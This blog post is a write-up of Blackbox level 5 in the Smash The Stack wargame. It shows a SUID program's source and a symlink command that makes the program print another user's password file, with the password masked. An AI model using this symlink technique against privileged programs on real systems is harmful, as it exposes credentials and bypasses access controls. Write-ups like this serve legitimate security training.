Blackbox Level 5 – Path/File Hijacking with Symlinks

Today we’re going to be looking at level 5 of the Blackbox wargame from the Smash The Stack network.  As always, the final password will be replaced with Y’s, and if you wish to follow a long, you will already need to have the password to level 5.  So without further adieu, let’s get started by ssh’ing into blackbox as level5.

Upon logging in, a quick directory listing shows us an executable called “list” and what we can assume is it’s source code, “list.c”.  To evaluate the program, let’s move forward by viewing the file “list.c”.

level5@blackbox:~$ more list.c
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[100];
size_t len;
char fixedbuf[10240];
FILE *fh;
char *ptr = fixedbuf;
int i;

fh = fopen(“somefile”, “r”);
if(!fh)
return 0;

while((len = fread(buf, 1, 100, fh)) > 0) {
for(i = 0; i < len; i++) {
// Disable output modifiers
switch(buf[i]) {
case 0xFF:
case 0x00:
case 0x01:
break;
default:
*ptr = buf[i];
ptr++;
}
}
}
printf(“%s”, fixedbuf);

fclose(fh);
}

Upon inspection we can see a few members of the main function declared, followed by the procedure.  Some of the members are: a 100 character array called buf, a variable called len which is of size_t, a 10K char array called fixedbuf, a FILE pointer called fh, a char pointer called ptr (instantiated to point to the start of fixedbuf), and an int called i.  Following member declaration, the procedure starts.

First, a local file called “somefile” is opened for reading and passed to the FILE pointer “fh”.  If there is a problem opening the file for reading, the program exits returning 0.  Next, 100 bytes are read from the file at a time into the “buf” array.  These bytes are read through progressively and as long as they aren’t an instance of 0xFF, 0x00, or 0x01, they are copied into “fixedbuf”, and the next byte is assessed.  Once the full file has been copied into “fixedbuf,” the printf is called to print the string represented at “fixedbuf.”  Finally “fh” is closed and the program exits.

So, let’s think about how this program works, and how we might be able to alter it’s assumptions to get the password for level 6.  We know that blowfish stores passwords in the home directories, so we need to read /home/level6/password.  We also know this program is running SUID as level6 and thus should be able to read that file.  However, the program is set to read a hard-coded file name, the file called “somefile” in the current directory.  Thus, what can we do?  Even if we switched directories to /home/level6, how could we get the program to read “password” file instead of “somefile” file?

Well, we can use links.  Links are available in many operating systems and essentially allow for multiple virtual locations (such as “/tmp/.tt/file1” and “/tmp/.tt/file2”) to point to the same physical file on a disk.  This is useful to save space on a disk or help organize files that are shared.  Symbolic links or symlinks make it so even though two different paths point to the same file, they still resolve as the separate paths.  We can make use of symlinks in this level to create a symlink called “somefile” in the local directory which points to the file we want to read, /home/level6/password.  To make a link we’re going to use the linux command “ln”.  To get information on the command, please perform “ln –help” on your own, I don’t want to post it here just to save space.  However, in creating symlinks, we’re going to have to use the -s flag.  Let’s look at making the symlink in action:

level5@blackbox:/tmp/.ttt$ ln -s /home/level6/password ./somefile
level5@blackbox:/tmp/.ttt$ ls -la
total 16
drwxr-xr-x 2 level5 gamers 4096 Sep 25 02:40 .
drwx-wx-wt 95 root root 12288 Sep 25 02:40 ..
lrwxrwxrwx 1 level5 gamers 21 Sep 25 02:40 somefile -> /home/level6/password

From the file listing, we can see that there is now a file called “somefile” and on the information about the file, it is marked as “l” for link.  We also see that it points to /home/level6/password.  Now let’s go a head and run the vulnerable program and see if it resolves the link and reads the password for us!

level5@blackbox:/tmp/.ttt$ ~/list
YYYYYYYYYYYY

There we have it!  Using a simple symlink we were able to take a program which reads and displays the contents of a file with a hardcoded filename, and cause it to output any file of our choosing, even one with sensitive information such as a password!

This entry was posted in BlackBox, Smash The Stack, Wargames and tagged , , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published.